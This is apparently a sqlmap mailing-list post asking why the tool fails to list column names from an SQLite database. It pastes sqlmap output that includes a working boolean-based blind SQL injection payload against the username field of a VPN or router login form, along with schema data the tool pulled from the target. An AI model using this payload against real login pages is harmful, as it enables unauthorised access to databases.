[sqlmap-users] Error with Sqlite
Brought to you by:
inquisb
From: Gerardo I. G. <igl...@gm...> - 2013-04-01 17:58:05
|
When trying to enumerate columns names from a table (-T tablename --columns) sqlmap successfully retrieves the schema from sqlite_master, however it fails on identifying the columns names. I get the next output: **************************************************************************** [11:57:54] [INFO] resuming back-end DBMS 'sqlite' [11:57:54] [INFO] testing connection to the target url sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: POST Parameter: SSLVPNUser.UserName Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause Payload: thispage=[redacted]&SSLVPNUser.UserName=-8559' OR (8414=8414) AND 'NdYt'='NdYt&SSLVPNUser.Password=[redacted]&button.login.routerStatus=Log In&Login.userAgent=Mozilla/5.0 (X11%3B Ubuntu%3B Linux x86_64%3B rv:19.0) Gecko/20100101 Firefox/19.0 --- [11:57:55] [INFO] the back-end DBMS is SQLite [11:57:55] [INFO] fetching banner [11:57:56] [INFO] resumed: 3.3.17 back-end DBMS: SQLite banner: '3.3.17' [11:57:56] [INFO] fetching columns for table 'dbUpdateRegisterTbl' in database 'SQLite_masterdb' [11:57:56] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval [11:57:56] [INFO] retrieved: CREATE TABLE dbUpdateRegisterTbl ' compName text NOT NULL, stopIfError integer NOT NULL, waitForMe integer NOT NULL, tableName text NOT NULL, rowIndex integer, onUpdate integer NOT NULL, onAdd integer NOT NULL, onDelete integer NOT NULL ) Database: SQLite_masterdb Table: dbUpdateRegisterTbl [0 columns] +--------+ | Column | +--------+ +--------+ [12:35:19] [INFO] fetched data logged to text files under '[redacted]' **************************************************************************** The same happens with every table in the DB. Is this some bug in sqlmap or something exceptional with the DB. |